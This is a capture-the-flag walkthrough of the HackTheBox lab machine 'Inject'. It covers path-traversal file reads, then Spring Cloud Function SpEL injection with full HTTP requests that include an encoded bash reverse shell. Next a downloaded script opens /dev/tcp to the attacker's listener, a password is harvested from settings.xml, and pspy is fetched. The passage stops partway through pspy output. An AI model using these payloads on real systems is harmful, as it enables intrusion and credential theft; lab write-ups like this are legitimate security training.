当前位置: 首页 > news >正文

https://app.hackthebox.com/machines/Inject

https://app.hackthebox.com/machines/Inject

Ref:

1.https://blog.csdn.net/qq_58869808/article/details/129505388

2.https://blog.csdn.net/m0_73998094/article/details/129474782

image-20230330193424516

info collecting

┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ nmap -A 10.10.11.204 -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-30 10:17 HKT
Nmap scan report for 10.10.11.204 (10.10.11.204)
Host is up (0.55s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.16 seconds┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ nikto -h http://10.10.11.204:8080/                              
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.11.204
+ Target Hostname:    10.10.11.204
+ Target Port:        8080
+ Start Time:         2023-03-30 10:31:35 (GMT8)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'content-disposition' found, with contents: inline;filename=f.txt
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'accept-patch' found, with contents: 
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.

browser it

image-20230330194648617

image-20230330194702633

image-20230330194717284

image-20230330195118279

we cant find exploit on the blog

image-20230330195205572

find reading file access

image-20230330194757375

image-20230330194841515

GET /show_image?img=../../../../../../etc/passwd HTTP/1.1
Host: 10.10.11.204:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1HTTP/1.1 200 
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 1986
Date: Thu, 30 Mar 2023 03:02:42 GMT
Connection: closeroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
frank:x:1000:1000:frank:/home/frank:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
phil:x:1001:1001::/home/phil:/bin/bash
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel:x:997:996::/var/log/laurel:/bin/false

image-20230330200109984

		<dependency><groupId>org.springframework.cloud</groupId><artifactId>spring-cloud-function-web</artifactId><version>3.2.2</version></dependency>

image-20230330200313283

POST /functionRouter HTTP/1.1
Host: 127.0.0.1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(“bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODggMD4mMQo=}|{base64,-d}|{bash,-i}”)
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

xxx

image-20230330200448851

image-20230330200653307

or

image-20230330201530873

POST /functionRouter HTTP/1.1
Host: 10.10.11.204:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/pw.txt")
Content-Type: application/x-www-form-urlencoded
Content-Length: 7xxx

image-20230330201557008

GET /show_image?img=../../../../../../tmp HTTP/1.1
Host: 10.10.11.204:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

poc seccuss

so!

┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ cat pw.sh                                                                                                                                                              130 ⨯
#/bin/bash
bash -i >& /dev/tcp/10.10.16.3/4444 0>&1┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ python3 -m http.server 3333
Serving HTTP on 0.0.0.0 port 3333 (http://0.0.0.0:3333/) ...
10.10.16.3 - - [30/Mar/2023 16:53:30] "GET /pw.sh HTTP/1.1" 200 -
10.10.16.3 - - [30/Mar/2023 16:53:30] code 404, message File not found
10.10.16.3 - - [30/Mar/2023 16:53:30] "GET /favicon.ico HTTP/1.1" 404 -
10.10.16.3 - - [30/Mar/2023 16:54:03] "GET /pw.sh HTTP/1.1" 200 -
10.10.16.3 - - [30/Mar/2023 16:54:50] "GET /pw.sh HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 16:55:19] "GET /pw.sh HTTP/1.1" 200 -
10.10.16.3 - - [30/Mar/2023 17:10:23] "GET / HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 17:10:33] "GET /pspy64 HTTP/1.1" 200 -

image-20230330201750075

wget succes

image-20230330201853216

bash!

POST /functionRouter HTTP/1.1
Host: 10.10.11.204:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash /tmp/pw.sh")
Content-Type: application/x-www-form-urlencoded
Content-Length: 7xxx

image-20230330202019359

┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.204.
Ncat: Connection from 10.10.11.204:55144.
bash: cannot set terminal process group (825): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ id
id
uid=1000(frank) gid=1000(frank) groups=1000(frank)
bash-5.0$ 

find phil

frank@inject:/$ find / -group frank -type f 2>/dev/null | grep -v "proc"
find / -group frank -type f 2>/dev/null | grep -v "proc"
/tmp/pwned
/tmp/hsperfdata_frank/825
/tmp/pw.sh
/tmp/pwn.sh
/home/frank/.bashrc
/home/frank/.m2/settings.xml
/home/frank/.cache/motd.legal-displayed
/home/frank/.profile
frank@inject:/$ cat /home/frank/.m2/settings.xmlcat /home/frank/.m2/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"><servers><server><id>Inject</id><username>phil</username><password>DocPhillovestoInject123</password><privateKey>${user.home}/.ssh/id_dsa</privateKey><filePermissions>660</filePermissions><directoryPermissions>660</directoryPermissions><configuration></configuration></server></servers>
</settings>
frank@inject:/$ 
frank@inject:/$ su phil
su phil
Password: DocPhillovestoInject123id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
python3 -c 'import pty; pty.spawn("/bin/bash")'  
phil@inject:/$ cd
cd
phil@inject:~$ cat user.txt
cat user.txt
db101b862811be45bc97262357d34b05

upload pspy6

phil@inject:~$ wget http://10.10.16.3/pspy64 -O /tmp/pspy64
wget http://10.10.16.3/pspy64 -O /tmp/pspy64
--2023-03-30 09:26:58--  http://10.10.16.3/pspy64
Connecting to 10.10.16.3:80... failed: Connection refused.
phil@inject:~$ wget http://10.10.16.3:3333/pspy64 -O /tmp/pspy64
wget http://10.10.16.3:3333/pspy64 -O /tmp/pspy64
--2023-03-30 09:27:27--  http://10.10.16.3:3333/pspy64
Connecting to 10.10.16.3:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘/tmp/pspy64’/tmp/pspy64         100%[===================>]   2.96M   654KB/s    in 14s     2023-03-30 09:27:42 (218 KB/s) - ‘/tmp/pspy64’ saved [3104768/3104768]phil@inject:~$ pspy64
pspy64
pspy64: command not found
phil@inject:~$ chmod +x /pspy64
chmod +x /pspy64
chmod: cannot access '/pspy64': No such file or directory
phil@inject:~$ chmod +x /tmp/pspy64
chmod +x /tmp/pspy64

get the result

phil@inject:~$ /tmp/pspy64
/tmp/pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d██▓███    ██████  ██▓███ ▓██   ██▓▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ ░░       ░  ░  ░  ░░       ▒ ▒ ░░  ░           ░ ░     ░ ░     Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/03/30 09:28:21 CMD: UID=1001  PID=18163  | /tmp/pspy64 
2023/03/30 09:28:21 CMD: UID=0     PID=18009  | 
2023/03/30 09:28:21 CMD: UID=0     PID=18003  | 
2023/03/30 09:28:21 CMD: UID=105   PID=17965  | /usr/lib/apt/methods/http 
2023/03/30 09:28:21 CMD: UID=105   PID=17964  | /usr/lib/apt/methods/http 
2023/03/30 09:28:21 CMD: UID=0     PID=17955  | apt-get -qq -y update 
2023/03/30 09:28:21 CMD: UID=0     PID=17925  | /bin/sh /usr/lib/apt/apt.systemd.daily lock_is_held update 
2023/03/30 09:28:21 CMD: UID=0     PID=17921  | /bin/sh /usr/lib/apt/apt.systemd.daily update 
2023/03/30 09:28:21 CMD: UID=1001  PID=17753  | /bin/bash 
2023/03/30 09:28:21 CMD: UID=1001  PID=17751  | python3 -c import pty; pty.spawn("/bin/bash") 
2023/03/30 09:28:21 CMD: UID=1001  PID=17735  | bash 
2023/03/30 09:28:21 CMD: UID=0     PID=17732  | su phil 
2023/03/30 09:28:21 CMD: UID=1000  PID=17702  | bash -i 
2023/03/30 09:28:21 CMD: UID=1000  PID=17700  | bash /tmp/pw.sh 
2023/03/30 09:28:21 CMD: UID=0     PID=17562  | 
2023/03/30 09:28:21 CMD: UID=0     PID=17538  | 
2023/03/30 09:28:21 CMD: UID=1001  PID=17329  | bash -p 
2023/03/30 09:28:21 CMD: UID=1001  PID=17264  | /bin/bash 
2023/03/30 09:28:21 CMD: UID=1001  PID=17261  | python3 -c import pty; pty.spawn("/bin/bash") 
2023/03/30 09:28:21 CMD: UID=1001  PID=17251  | bash 
2023/03/30 09:28:21 CMD: UID=0     PID=17246  | su phil 
2023/03/30 09:28:21 CMD: UID=1000  PID=17235  | bash -i 
2023/03/30 09:28:21 CMD: UID=1000  PID=17233  | bash /tmp/pw.sh 
2023/03/30 09:28:21 CMD: UID=0     PID=17096  | 
2023/03/30 09:28:21 CMD: UID=0     PID=16902  | 
2023/03/30 09:28:21 CMD: UID=1001  PID=16613  | /bin/bash 
2023/03/30 09:28:21 CMD: UID=1001  PID=16610  | python3 -c import pty; pty.spawn('/bin/bash') 
2023/03/30 09:28:21 CMD: UID=1001  PID=16478  | bash 
2023/03/30 09:28:21 CMD: UID=0     PID=16462  | su phil 
2023/03/30 09:28:21 CMD: UID=1000  PID=16332  | bash -i 
2023/03/30 09:28:21 CMD: UID=1000  PID=16325  | bash -i 
2023/03/30 09:28:21 CMD: UID=1000  PID=16321  | bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE2LjMyLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i} 
2023/03/30 09:28:21 CMD: UID=1001  PID=16152  | bash 
2023/03/30 09:28:21 CMD: UID=0     PID=16144  | su phil 
2023/03/30 09:28:21 CMD: UID=1000  PID=16011  | /bin/bash 
2023/03/30 09:28:21 CMD: UID=1000  PID=16010  | python3 -c import pty; pty.spawn('/bin/bash') 
2023/03/30 09:28:21 CMD: UID=1000  PID=16003  | bash -i 
2023/03/30 09:28:21 CMD: UID=1000  PID=15996  | bash -i 
2023/03/30 09:28:21 CMD: UID=1000  PID=15992  | bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE2LjMyLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i} 
2023/03/30 09:28:21 CMD: UID=1001  PID=15967  | (sd-pam) 
2023/03/30 09:28:21 CMD: UID=1001  PID=15966  | /lib/systemd/systemd --user 
2023/03/30 09:28:21 CMD: UID=0     PID=15823  | 
2023/03/30 09:28:21 CMD: UID=0     PID=15807  | 
2023/03/30 09:28:21 CMD: UID=0     PID=13895  | 
2023/03/30 09:28:21 CMD: UID=0     PID=13878  | /usr/lib/upower/upowerd 
2023/03/30 09:28:21 CMD: UID=0     PID=13873  | /usr/libexec/fwupd/fwupd 
2023/03/30 09:28:21 CMD: UID=107   PID=1058   | /usr/sbin/uuidd --socket-activation 
2023/03/30 09:28:21 CMD: UID=0     PID=976    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2023/03/30 09:28:21 CMD: UID=0     PID=975    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2023/03/30 09:28:21 CMD: UID=1     PID=962    | /usr/sbin/atd -f 
2023/03/30 09:28:21 CMD: UID=0     PID=959    | /usr/sbin/cron -f 
2023/03/30 09:28:21 CMD: UID=101   PID=920    | /lib/systemd/systemd-resolved 
2023/03/30 09:28:21 CMD: UID=0     PID=856    | /usr/sbin/ModemManager 
2023/03/30 09:28:21 CMD: UID=1000  PID=825    | /usr/bin/java -Ddebug -jar /var/www/WebApp/target/spring-webapp.jar 
2023/03/30 09:28:21 CMD: UID=0     PID=822    | /usr/lib/udisks2/udisksd 
2023/03/30 09:28:21 CMD: UID=0     PID=817    | /lib/systemd/systemd-logind 
2023/03/30 09:28:21 CMD: UID=104   PID=816    | /usr/sbin/rsyslogd -n -iNONE 
2023/03/30 09:28:21 CMD: UID=0     PID=815    | /usr/lib/policykit-1/polkitd --no-debug 
2023/03/30 09:28:21 CMD: UID=0     PID=813    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2023/03/30 09:28:21 CMD: UID=0     PID=811    | /usr/sbin/irqbalance --foreground 
2023/03/30 09:28:21 CMD: UID=103   PID=804    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2023/03/30 09:28:21 CMD: UID=0     PID=802    | /usr/lib/accountsservice/accounts-daemon 
2023/03/30 09:28:21 CMD: UID=0     PID=763    | 
2023/03/30 09:28:21 CMD: UID=0     PID=736    | /usr/bin/vmtoolsd 
2023/03/30 09:28:21 CMD: UID=0     PID=733    | /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0                                                                                                                                                                      
2023/03/30 09:28:21 CMD: UID=0     PID=731    | /usr/bin/VGAuthService 
2023/03/30 09:28:21 CMD: UID=102   PID=730    | /lib/systemd/systemd-timesyncd 
2023/03/30 09:28:21 CMD: UID=0     PID=705    | /sbin/auditd 
2023/03/30 09:28:21 CMD: UID=0     PID=685    | 
2023/03/30 09:28:21 CMD: UID=0     PID=684    | 
2023/03/30 09:28:21 CMD: UID=0     PID=672    | /sbin/multipathd -d -s 
2023/03/30 09:28:21 CMD: UID=0     PID=671    | 
2023/03/30 09:28:21 CMD: UID=0     PID=670    | 
2023/03/30 09:28:21 CMD: UID=0     PID=669    | 
2023/03/30 09:28:21 CMD: UID=0     PID=668    | 
2023/03/30 09:28:21 CMD: UID=100   PID=539    | /lib/systemd/systemd-networkd 
2023/03/30 09:28:21 CMD: UID=0     PID=522    | /lib/systemd/systemd-udevd 
2023/03/30 09:28:21 CMD: UID=0     PID=490    | /lib/systemd/systemd-journald 
2023/03/30 09:28:21 CMD: UID=0     PID=433    | 
2023/03/30 09:28:21 CMD: UID=0     PID=432    | 
2023/03/30 09:28:21 CMD: UID=0     PID=431    | 
2023/03/30 09:28:21 CMD: UID=0     PID=377    | 
2023/03/30 09:28:21 CMD: UID=0     PID=346    | 
2023/03/30 09:28:21 CMD: UID=0     PID=344    | 
2023/03/30 09:28:21 CMD: UID=0     PID=333    | 
2023/03/30 09:28:21 CMD: UID=0     PID=332    | 
2023/03/30 09:28:21 CMD: UID=0     PID=331    | 
2023/03/30 09:28:21 CMD: UID=0     PID=301    | 
2023/03/30 09:28:21 CMD: UID=0     PID=300    | 
2023/03/30 09:28:21 CMD: UID=0     PID=299    | 
2023/03/30 09:28:21 CMD: UID=0     PID=298    | 
2023/03/30 09:28:21 CMD: UID=0     PID=297    | 
2023/03/30 09:28:21 CMD: UID=0     PID=296    | 
2023/03/30 09:28:21 CMD: UID=0     PID=295    | 
2023/03/30 09:28:21 CMD: UID=0     PID=294    | 
2023/03/30 09:28:21 CMD: UID=0     PID=293    | 
2023/03/30 09:28:21 CMD: UID=0     PID=292    | 
2023/03/30 09:28:21 CMD: UID=0     PID=291    | 
2023/03/30 09:28:21 CMD: UID=0     PID=290    | 
2023/03/30 09:28:21 CMD: UID=0     PID=289    | 
2023/03/30 09:28:21 CMD: UID=0     PID=288    | 
2023/03/30 09:28:21 CMD: UID=0     PID=287    | 
2023/03/30 09:28:21 CMD: UID=0     PID=286    | 
2023/03/30 09:28:21 CMD: UID=0     PID=285    | 
2023/03/30 09:28:21 CMD: UID=0     PID=284    | 
2023/03/30 09:28:21 CMD: UID=0     PID=283    | 
2023/03/30 09:28:21 CMD: UID=0     PID=282    | 
2023/03/30 09:28:21 CMD: UID=0     PID=281    | 
2023/03/30 09:28:21 CMD: UID=0     PID=280    | 
2023/03/30 09:28:21 CMD: UID=0     PID=279    | 
2023/03/30 09:28:21 CMD: UID=0     PID=278    | 
2023/03/30 09:28:21 CMD: UID=0     PID=277    | 
2023/03/30 09:28:21 CMD: UID=0     PID=276    | 
2023/03/30 09:28:21 CMD: UID=0     PID=275    | 
2023/03/30 09:28:21 CMD: UID=0     PID=274    | 
2023/03/30 09:28:21 CMD: UID=0     PID=273    | 
2023/03/30 09:28:21 CMD: UID=0     PID=272    | 
2023/03/30 09:28:21 CMD: UID=0     PID=271    | 
2023/03/30 09:28:21 CMD: UID=0     PID=270    | 
2023/03/30 09:28:21 CMD: UID=0     PID=269    | 
2023/03/30 09:28:21 CMD: UID=0     PID=268    | 
2023/03/30 09:28:21 CMD: UID=0     PID=267    | 
2023/03/30 09:28:21 CMD: UID=0     PID=266    | 
2023/03/30 09:28:21 CMD: UID=0     PID=265    | 
2023/03/30 09:28:21 CMD: UID=0     PID=264    | 
2023/03/30 09:28:21 CMD: UID=0     PID=263    | 
2023/03/30 09:28:21 CMD: UID=0     PID=262    | 
2023/03/30 09:28:21 CMD: UID=0     PID=261    | 
2023/03/30 09:28:21 CMD: UID=0     PID=260    | 
2023/03/30 09:28:21 CMD: UID=0     PID=259    | 
2023/03/30 09:28:21 CMD: UID=0     PID=257    | 
2023/03/30 09:28:21 CMD: UID=0     PID=255    | 
2023/03/30 09:28:21 CMD: UID=0     PID=254    | 
2023/03/30 09:28:21 CMD: UID=0     PID=251    | 
2023/03/30 09:28:21 CMD: UID=0     PID=249    | 
2023/03/30 09:28:21 CMD: UID=0     PID=247    | 
2023/03/30 09:28:21 CMD: UID=0     PID=245    | 
2023/03/30 09:28:21 CMD: UID=0     PID=243    | 
2023/03/30 09:28:21 CMD: UID=0     PID=241    | 
2023/03/30 09:28:21 CMD: UID=0     PID=239    | 
2023/03/30 09:28:21 CMD: UID=0     PID=237    | 
2023/03/30 09:28:21 CMD: UID=0     PID=235    | 
2023/03/30 09:28:21 CMD: UID=0     PID=233    | 
2023/03/30 09:28:21 CMD: UID=0     PID=231    | 
2023/03/30 09:28:21 CMD: UID=0     PID=229    | 
2023/03/30 09:28:21 CMD: UID=0     PID=228    | 
2023/03/30 09:28:21 CMD: UID=0     PID=227    | 
2023/03/30 09:28:21 CMD: UID=0     PID=225    | 
2023/03/30 09:28:21 CMD: UID=0     PID=223    | 
2023/03/30 09:28:21 CMD: UID=0     PID=219    | 
2023/03/30 09:28:21 CMD: UID=0     PID=215    | 
2023/03/30 09:28:21 CMD: UID=0     PID=214    | 
2023/03/30 09:28:21 CMD: UID=0     PID=159    | 
2023/03/30 09:28:21 CMD: UID=0     PID=146    | 
2023/03/30 09:28:21 CMD: UID=0     PID=143    | 
2023/03/30 09:28:21 CMD: UID=0     PID=134    | 
2023/03/30 09:28:21 CMD: UID=0     PID=132    | 
2023/03/30 09:28:21 CMD: UID=0     PID=130    | 
2023/03/30 09:28:21 CMD: UID=0     PID=129    | 
2023/03/30 09:28:21 CMD: UID=0     PID=128    | 
2023/03/30 09:28:21 CMD: UID=0     PID=127    | 
2023/03/30 09:28:21 CMD: UID=0     PID=125    | 
2023/03/30 09:28:21 CMD: UID=0     PID=124    | 
2023/03/30 09:28:21 CMD: UID=0     PID=123    | 
2023/03/30 09:28:21 CMD: UID=0     PID=122    | 
2023/03/30 09:28:21 CMD: UID=0     PID=121    | 
2023/03/30 09:28:21 CMD: UID=0     PID=120    | 
2023/03/30 09:28:21 CMD: UID=0     PID=119    | 
2023/03/30 09:28:21 CMD: UID=0     PID=118    | 
2023/03/30 09:28:21 CMD: UID=0     PID=117    | 
2023/03/30 09:28:21 CMD: UID=0     PID=116    | 
2023/03/30 09:28:21 CMD: UID=0     PID=115    | 
2023/03/30 09:28:21 CMD: UID=0     PID=114    | 
2023/03/30 09:28:21 CMD: UID=0     PID=113    | 
2023/03/30 09:28:21 CMD: UID=0     PID=112    | 
2023/03/30 09:28:21 CMD: UID=0     PID=111    | 
2023/03/30 09:28:21 CMD: UID=0     PID=110    | 
2023/03/30 09:28:21 CMD: UID=0     PID=109    | 
2023/03/30 09:28:21 CMD: UID=0     PID=108    | 
2023/03/30 09:28:21 CMD: UID=0     PID=107    | 
2023/03/30 09:28:21 CMD: UID=0     PID=106    | 
2023/03/30 09:28:21 CMD: UID=0     PID=105    | 
2023/03/30 09:28:21 CMD: UID=0     PID=104    | 
2023/03/30 09:28:21 CMD: UID=0     PID=103    | 
2023/03/30 09:28:21 CMD: UID=0     PID=102    | 
2023/03/30 09:28:21 CMD: UID=0     PID=101    | 
2023/03/30 09:28:21 CMD: UID=0     PID=100    | 
2023/03/30 09:28:21 CMD: UID=0     PID=99     | 
2023/03/30 09:28:21 CMD: UID=0     PID=98     | 
2023/03/30 09:28:21 CMD: UID=0     PID=97     | 
2023/03/30 09:28:21 CMD: UID=0     PID=96     | 
2023/03/30 09:28:21 CMD: UID=0     PID=95     | 
2023/03/30 09:28:21 CMD: UID=0     PID=94     | 
2023/03/30 09:28:21 CMD: UID=0     PID=93     | 
2023/03/30 09:28:21 CMD: UID=0     PID=92     | 
2023/03/30 09:28:21 CMD: UID=0     PID=90     | 
2023/03/30 09:28:21 CMD: UID=0     PID=89     | 
2023/03/30 09:28:21 CMD: UID=0     PID=86     | 
2023/03/30 09:28:21 CMD: UID=0     PID=85     | 
2023/03/30 09:28:21 CMD: UID=0     PID=84     | 
2023/03/30 09:28:21 CMD: UID=0     PID=83     | 
2023/03/30 09:28:21 CMD: UID=0     PID=82     | 
2023/03/30 09:28:21 CMD: UID=0     PID=81     | 
2023/03/30 09:28:21 CMD: UID=0     PID=80     | 
2023/03/30 09:28:21 CMD: UID=0     PID=79     | 
2023/03/30 09:28:21 CMD: UID=0     PID=78     | 
2023/03/30 09:28:21 CMD: UID=0     PID=31     | 
2023/03/30 09:28:21 CMD: UID=0     PID=30     | 
2023/03/30 09:28:21 CMD: UID=0     PID=29     | 
2023/03/30 09:28:21 CMD: UID=0     PID=28     | 
2023/03/30 09:28:21 CMD: UID=0     PID=27     | 
2023/03/30 09:28:21 CMD: UID=0     PID=26     | 
2023/03/30 09:28:21 CMD: UID=0     PID=24     | 
2023/03/30 09:28:21 CMD: UID=0     PID=23     | 
2023/03/30 09:28:21 CMD: UID=0     PID=22     | 
2023/03/30 09:28:21 CMD: UID=0     PID=21     | 
2023/03/30 09:28:21 CMD: UID=0     PID=20     | 
2023/03/30 09:28:21 CMD: UID=0     PID=18     | 
2023/03/30 09:28:21 CMD: UID=0     PID=17     | 
2023/03/30 09:28:21 CMD: UID=0     PID=16     | 
2023/03/30 09:28:21 CMD: UID=0     PID=15     | 
2023/03/30 09:28:21 CMD: UID=0     PID=14     | 
2023/03/30 09:28:21 CMD: UID=0     PID=12     | 
2023/03/30 09:28:21 CMD: UID=0     PID=11     | 
2023/03/30 09:28:21 CMD: UID=0     PID=10     | 
2023/03/30 09:28:21 CMD: UID=0     PID=9      | 
2023/03/30 09:28:21 CMD: UID=0     PID=8      | 
2023/03/30 09:28:21 CMD: UID=0     PID=6      | 
2023/03/30 09:28:21 CMD: UID=0     PID=4      | 
2023/03/30 09:28:21 CMD: UID=0     PID=3      | 
2023/03/30 09:28:21 CMD: UID=0     PID=2      | 
2023/03/30 09:28:21 CMD: UID=0     PID=1      | /sbin/init auto automatic-ubiquity noprompt 
2023/03/30 09:28:21 CMD: UID=0     PID=18172  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:22 CMD: UID=1001  PID=18173  | ls --color=auto 
2023/03/30 09:28:23 CMD: UID=1001  PID=18174  | ls --color=auto 
2023/03/30 09:28:24 CMD: UID=1001  PID=18176  | ls --color=auto 
2023/03/30 09:28:26 CMD: UID=0     PID=18177  | 
2023/03/30 09:28:27 CMD: UID=0     PID=18178  | apt-get -qq -y update 
2023/03/30 09:28:27 CMD: UID=0     PID=18179  | touch /var/lib/apt/periodic/update-stamp 
2023/03/30 09:28:27 CMD: UID=0     PID=18180  | /bin/sh /usr/lib/apt/apt.systemd.daily lock_is_held update 
2023/03/30 09:28:27 CMD: UID=0     PID=18202  | 
2023/03/30 09:28:27 CMD: UID=0     PID=18201  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18200  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18199  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18198  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18197  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18196  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18195  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18194  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18193  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18192  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18191  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18190  | /lib/systemd/systemd-udevd 
